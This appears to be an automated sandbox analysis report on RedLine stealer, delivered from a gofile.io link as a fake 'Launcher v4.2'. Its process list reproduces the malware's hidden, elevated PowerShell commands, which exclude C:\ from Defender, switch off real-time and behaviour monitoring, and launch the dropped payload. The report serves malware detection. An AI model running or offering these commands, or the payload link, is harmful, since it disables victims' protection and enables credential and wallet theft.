Analysis Overview
Threat Level: Known bad
The file http://gofile.io/d/NxfCv2 was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Modifies registry class
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
| Reported | 2024-07-12 21:01 |
Signatures
Analysis: behavioral1
Detonation Overview
| Submitted | 2024-07-12 21:01 |
| Reported | 2024-07-12 21:06 |
| Platform | win10v2004-20240709-en |
| Max time kernel | 252s |
| Max time network | 263s |
Command Line
Signatures
RedLine
RedLine payload
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Launcher v4.2\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1720818300712.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1720818300712.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2660 set thread context of 1100 | N/A | C:\Users\Admin\AppData\Local\Temp\1720818300712.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4512 set thread context of 1792 | N/A | C:\Users\Admin\AppData\Local\Temp\1720818300712.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\javaw.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://gofile.io/d/NxfCv2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99a5b46f8,0x7ff99a5b4708,0x7ff99a5b4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5388 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6384 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,16980282593473853943,13369389837424568759,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5824 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Launcher v4.2\" -spe -an -ai#7zMap10348:88:7zEvent17570
C:\Users\Admin\Downloads\Launcher v4.2\Setup.exe
"C:\Users\Admin\Downloads\Launcher v4.2\Setup.exe"
C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\javaw.exe
"C:\Users\Admin\Downloads\Launcher v4.2\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Start-Process "C:\Users\Admin\AppData\Local\Temp\/1720818300712.exe"'}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1720818300712.exe
C:\Users\Admin\AppData\Local\Temp\1720818300712.exe
"C:\Users\Admin\AppData\Local\Temp\1720818300712.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1720818300712.exe
"C:\Users\Admin\AppData\Local\Temp\1720818300712.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
Files
| MD5 | ce4ed78844b038e3a4b57cd2e6729215 |
| SHA1 | b605590c2a0e7bd25792aafb3c91cf955d37a987 |
| SHA256 | 4b07bbab67ec43331ca8efb2ec0cbb5b307e579128c37aef122ef54d3cd5cdbb |
| SHA512 | 1a63ae909a249f4565e50228c71b132e2464091e01f7481c96e7f59467392f7e4d41262664505db2ff1f462eb68cfb2330d9c60641d734090743d76f9686d7ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 07834d957e9db61752bde6b9d507ff07 |
| SHA1 | 3193a877478f386788a6e4a9a50ed11deb8f1c78 |
| SHA256 | 78c6508807a6145a7cb76517403d918ccf09b80f596a8979aa540eb6f16ef68a |
| SHA512 | e62c120d893a280d4f366779417b510436bff3b66f5d7d7f86146ce8fe9bf97afb22ace08f5a75b20a616543926854789edd4fc23bc4ca2c1c6b65ad6d1132cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 113d3bef53ad0fe92767c5353eb61d13 |
| SHA1 | a8ed61eeabf9ee0be32d799bc014d1db3cfc7836 |
| SHA256 | 0d857d0e668469c56a442adf132d466b569726085d5a2d394ab4c5d4f7d77c73 |
| SHA512 | 20a0312a07971f86d5752d126234d2f6578a4f928137558e70b3722b50fb93f43bb67e79eda3a4c82e08056040667f6c62086bfe20af1bd583fab500c435eab9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5982d2.TMP
| MD5 | ef753a6dcde66a9cf358cce6c47c0407 |
| SHA1 | 3c88cdb5bb7b4e92092137fd6b65cf7a78e6b907 |
| SHA256 | 041e43da865451c71ea353dd33a1fa61b011c5ed9362d216929337043c93418a |
| SHA512 | b4568679b3a29977d55074014cbf07f769218b945e59765e075e46659fdd86f24d8436e07751a4e331ac9397ce494a62cfdeb410aa9140ddf5c70721dabbcbf9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 25d4dfea2c5d1ec01a841755b168eb00 |
| SHA1 | 6f3ec83c88adda1c61f008397348abda56d5164c |
| SHA256 | 42cf79e5a9257950ecda9a93f144f436588c33df11879fa2bb5479ea5062cd65 |
| SHA512 | 5f0f69e7f9cf6bbeaffb7d2cfcd2a2bc20e0889758364369165360b3b50e2e649061ee6d61cc354861e76865826091695b5fda4b755e3ab6765074b4df6998ca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ff9c128083314518649d92d5eb904602 |
| SHA1 | 59226df9bc410048882e19adc9ebb2e1a11881e6 |
| SHA256 | b25f29433ffb54afb13342f5a8c5827c4929e274eafecd4b59aaa57bf3f99cde |
| SHA512 | f9ad3598e9388bde0fafe86b1fd639d1e414178d4c897ba051b8570a897c622dfa6ea3839644d212d0555dbaf494d2d56f72883099051dcdac314bf32f4b9190 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 0e898a781dea968b2126642372b5b161 |
| SHA1 | 6555099283eb9c16415a049fd9d09dc564092503 |
| SHA256 | c6bcb51eab14871a82e06f8011460eb5a78be3d33b8e1e3ab3b865ffe0ecb073 |
| SHA512 | 10f77253b25fde909b1af50872de885a54807ae8829f95c0088deb46dfc80c13481d8b447c7f96b24553df11eaae01a616f342a65f550a31b2638c9a207b9763 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 2892eee3e20e19a9ba77be6913508a54 |
| SHA1 | 7c4ef82faa28393c739c517d706ac6919a8ffc49 |
| SHA256 | 4f110831bb434c728a6895190323d159df6d531be8c4bb7109864eeb7c989ff2 |
| SHA512 | b13a336db33299ab3405e13811e3ed9e5a18542e5d835f2b7130a6ff4c22f74272002fc43e7d9f94ac3aa6a4d53518f87f25d90c29e0d286b6470667ea9336ae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e0a7432bc3b97f73ebf8200fc3fcbc99 |
| SHA1 | a8afdc14a57c57f05087d16489f847032633186d |
| SHA256 | 10a08849288a8a78c375e2b6b1edf70eea438e901e537cb2f65206505d0bcc29 |
| SHA512 | 628966a91530482c805a83ac5545329e30e87c60485c997ace90a6b7cd3a7b1214746bd30d8270e8dfd39a768ee9c0d7030f79ad9af09962a57fc222e00ab4f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ef8d773d27a92fc6f320f6415d9fd31d |
| SHA1 | 6af4f16cb965ca2a4e7a87c2e6534d74558cc2af |
| SHA256 | a4345051e3131065d282d7f3e80b94e30850a49a37a49d791f460dc98047af8f |
| SHA512 | e3da1f8ccd8c6bde4dbc3c28ac1e1bebaa033353f5b69297f7c52798a90dcfb177491eac55d37295bb5e0c36b78568a39952427e2bd2019d983974ce5fa47e0f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b5688004b4a4b9d8e69d485b1b53d5c2 |
| SHA1 | b0f31c745ee3550eb9814f3bec2b4d8893cf2e63 |
| SHA256 | 83b40f54933582221d908afdb1980038952c286482a71b05faf806acb3107d63 |
| SHA512 | 286514e4dfb0ebdb3245e59a0b3e4404aaf83d276508b3358db22912b2198423a415bc7eab9e551d207b68cb3b19dadee6e34f8da016aa418ee71bdef22b805b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c4916a961b5471047c2bf3f9988c88e5 |
| SHA1 | bcab14f462aad562b82c9d35e54c621f31672b2e |
| SHA256 | c3249559f2d7551526a8b27b64a578f72d4266938f37aa544aea6fce6be062ad |
| SHA512 | 6d8dae233e86a9c42e6918803bb6254bf9e5a1690789eefbc28806fe1ca4a446a5a8c6d2d9d456434f4058deb728474b8de254a151b5e53923e2115cf34d9a88 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b9a50a8f4c6e134642f4d04ba889643c |
| SHA1 | 50adc3f67b32888e3b69b28bab420bb955a6ddd3 |
| SHA256 | dd88832e95b44af8982632a6096c2d40ccb2862a72b5b7da6f2a3438acf8733c |
| SHA512 | 93fdf2642eff80c6c890f6935956afeaf507c0077bfb3205584e45ae56b36869ce53ea619f08a8e304c257e1054661b73ebd6ba62e6b811a6814984cb88907ab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ad4d2956d4f6f703fa75899077a87bc0 |
